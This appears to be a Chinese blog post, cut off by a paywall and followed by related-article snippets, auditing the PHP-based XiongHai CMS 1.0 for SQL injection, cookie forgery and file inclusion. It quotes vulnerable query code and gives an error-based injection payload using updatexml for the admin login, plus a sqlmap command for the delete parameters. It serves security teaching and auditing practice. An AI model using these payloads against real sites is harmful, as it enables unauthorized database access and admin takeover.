熊海cms代码审计

原创 已于 2025-04-16 17:43:01 修改 · 701 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#代码审计 #PHP #sql注入 #网络安全 #web安全

于 2025-04-15 21:02:41 首次发布

目录

sql注入

1. admin/files/login.php

2.  admin/files/columnlist.php

3.  admin/files/editcolumn.php

4.  admin/files/editlink.php

5.  admin/files/editsoft.php

6.  admin/files/editwz.php

7.  admin/files/linklist.php

8.  files/software.php

9.   files/content.php

cookie伪造

文件包含

sql注入

1. admin/files/login.php
$user=$_POST['user'];

if ($login<>""){
$query = "SELECT * FROM manage WHERE user='$user'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());

变量user可控并被带到sql语句中执行

有单引号,需要闭合

使用了mysql_error函数,使用报错注入

步骤:

burp抓包,发送到repeater

payload: admin' and updatexml(1,concat(0x7e,(select user())),1)--+

2.  admin/files/columnlist.php
$delete=$_GET['delete'];

$delete2=$_GET['delete2'];

if ($delete<>""){
$query = "DELETE FROM nav WHERE id='$delete'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());

if ($delete2<>""){
$query = "DELETE FROM navclass WHERE id='$delete2'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());

变量delete和delete2可控,并被带到sql语句中执行,字符型,使用报错注入

步骤:

把数据包保存成test.txt  python sqlmap.py -r test.txt

3.  admin/files/editcolumn.php
$id=$_GET['id'];
$type=$_GET['type'];

if ($type==1){
$query = "SELECT * FROM nav WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error()
最低0.47元/天 解锁文章
熊海1.0cmsPHP代码审计
2301_79724395的博客
08-05 1702
下载之后直接使用phpstduy搭建就好了。
熊海CMS代码审计
weixin_52125240的博客
04-08 5098
熊海CMS代码审计审计准备文件包含漏洞逻辑越权漏洞XSS漏洞SQL注入 前言:也算是第一次代码审计,肯定有很多地方会比较的生疏,也有很多地方不能注意到,所以希望大家也多给建议。 审计准备 我自己安装了phpstudy,然后用phpstudy的环境,来运行熊海的源码。 我们用Seay源代码审计系统先来扫一遍,看看有什么漏洞 扫到的漏洞还挺多的,但是很多都是误报,所以我们一个个去看过来。 文件包含漏洞 <?php //单一入口模式 error_reporting(0); //关闭错误显示 $file=
汇总-熊海CMS代码审计-入门网络安全知识点
程序员六七的博客
05-17 1063
我正在参加「掘金·启航计划」前言熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。作为一个早期的系统,里面代码存在许多漏洞利用点
登录处cookie验证逻辑漏洞——以熊海CMS为例
永远是少年
12-16 1364
今天继续给大家介绍渗透测试相关知识,本文主要内容是登录处cookie验证逻辑漏洞。 一、熊海CMS登陆处逻辑漏洞实战 二、熊海CMS登录处逻辑漏洞分析
熊海cms1.0代码审计
m0_60716947的博客
01-09 2547
熊海cms新手代码审计
代码审计熊海cms 首页文件包含漏洞复现
qq_43233085的博客
03-16 2134
代码审计熊海cms 首页文件包含漏洞复现熊海cms代码审计漏洞复现 熊海cms 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 代码审计 先使用Seay工具审计一波,根据关键代码回溯。 工具显示index.php中文件包含函数存在变量,存在...
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 7461
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
熊海CMS v1.0:个人及企业网站管理利器
最新发布
weixin_42593549的博客
11-09 1470
本文还有配套的精品资源,点击获取 简介:熊海CMS v1.0是一套多功能网站管理软件,旨在为不同类型的在线平台提供简化建设和维护的服务。其设计理念是易于上手,让非技术用户也能快速构建满足需求的网站。系统包括前端多设备兼容性设计、核心文件和用户指南,以及易用的文本编辑器和模板选择。此外,该系统还支持移动端优化,提供丰富的样式定制选项,并通过文件夹和目录结构简化网站的安装和配置...
php代码审计熊海cms
Zlirving_的博客
05-01 1661
  X00代码审计之旅 刚接触代码审计,所以找了个入门级别的php源码熊海cms进行审计。如果大佬发现有错误请告知哦~   熊海cms下载地址:http://js.down.chinaz.com/201503/xhcms_v1.0.rar 使用的是Seay审计工具,听说误报常用。但是作为新手,也可以培养自己检测误报的能力 开始实验吧~ (先自动审计一波) X01文件包含 举...
[白盒审计]熊海CMSV1.0(烦躁)
Y4tacker的博客
12-21 1173
文章目录前言installindex.php和admin\index.php存在文件包含漏洞/inc/checklogin.php存在越权登录/admin/files/login.php 万能密码登录报错注入/files/contact.php存在xss注入 前言 第一次额,也不算第一次了,但是倒是第一次一个一个功能分析,下面将从安装到各个功能一个一个测试 install 一眼看去唯一利用点,方式嘛也就是报错注入呗 $query = "UPDATE manage SET user='$user',passw
新手首次php代码审计--熊海cmsV1.0
weixin_67289581的博客
04-12 1675
首次代审--熊海cmsV1.0附源码下载链接将源码导入seay系统,并开始审计首次代审--熊海cmsV1.0附源码下载链接将源码导入seay系统,并开始审计。
[代码审计]—熊海cms
Sentiment的博客
04-18 1920
环境搭建 phpstudy新建个站,放入代码 创建数据库 访问install 确认后变成空白页面,于是打开源文件查看后 发现是由于php版本过高,部分函数无法使用导致 修改php版本后访问install搭建成功 在访问files目录时报错 原因是在文件包含的路径错误,包含inc/301.php会包含files目录下的inc/301.php,但inc和files属于同级目录,不在files中所以会报错,在前边加上…/即可 后来发现该文件夹下的所有文件都有该问题,如果一个个加…/未免有些麻烦,所以
代码审计-熊海CMSv1.0
sx____的博客
04-28 779
使用seay代码审计系统进行自动审计,发现有文件包含漏洞、sql注入漏洞和任意文件读取漏洞。
熊海cms_v1.0代码审计
RestoreJustice的博客
03-23 1146
取出密码与POST提交的密码进行比较验证),且将admin123用户的md5值(这里是1的md5)带进去给password参数进行验证,即可绕过控制台登录界面。将cid参数值写成XSS语句,SQL语句执行错误,将xss语句一并输出显示在页面,造成反射型XSS。使用phpstudy环境搭建,php版本要小于7(我这里使用php5.4),之后要自己新建一个数据库用于安转cms(cms不能自动新建数据库)号来表示不同的留言,对那条留言编辑要提交对应的id。后台注入挺多的,大多是未过滤造成的,这里不一一列举了。
代码审计熊海cms Cooike欺骗进入后台复现
qq_43233085的博客
03-16 998
代码审计熊海cms Cooike欺骗进入后台复现熊海cms代码审计漏洞复现 熊海cms 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 代码审计 问题出在inc->checklogin.php文件,具体代码如下: <?php $...
熊海(isea cms代码审计漏洞总结
Alexz__的博客
04-30 7233
iseacms简介 后台越权登录admin用户 后台/admin下SQL注入 文件包含漏洞 存储型XSS 管理界面CSRF删除文章 壹 iseacms简介 熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发; 网站样式设计简洁大方,整体功能点并不多,但功能正好够用;拥有一个前端客户端访问界面和一个完备的后台管理系统,并...
熊海cms——代码审计
mingyqf的博客
03-07 4384
前言 再基本了解了代码审计的方法后,看着各个师傅的博客跟着他们一步一步代码审计。 审计环境 使用小皮面板,新建网站 接着直接打开网站的install 就可以开始安装了 ps:至于为什么不能用php7.4.3 环境 安装请知道的师傅call 我 万分感谢! 审计过程 先了解文件目录 admin --管理后台文件夹 css --存放css的文件夹 files --存放页面的文件夹 images --存放图片的文件夹 inc
PHP代码审计demo之熊海cms
热门推荐
Love&Share
08-16 1万+
php漏洞的利用依赖PHP版本、Web中间件版本与类型、操作系统类型和版本以及这些软件的配置等多因素,一下环境为:wamp(win10+apache2.4.39+mysql5.7.26+php5.2.17) 代码审计的四种方式: 1.函数回溯 2.追溯变量 3.功能点 4.通读全文 这四种方法各有优缺,通读全文法会对整个cms体系有更深刻得了解,可以发现更隐秘的漏洞,以及逻辑漏洞。根据敏感函数来逆向追踪参数的传递过程,是目前使用得最多的一种方式,因 为大多数漏洞是由于函数的使用不当造成的。 下图为 熊海cm
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值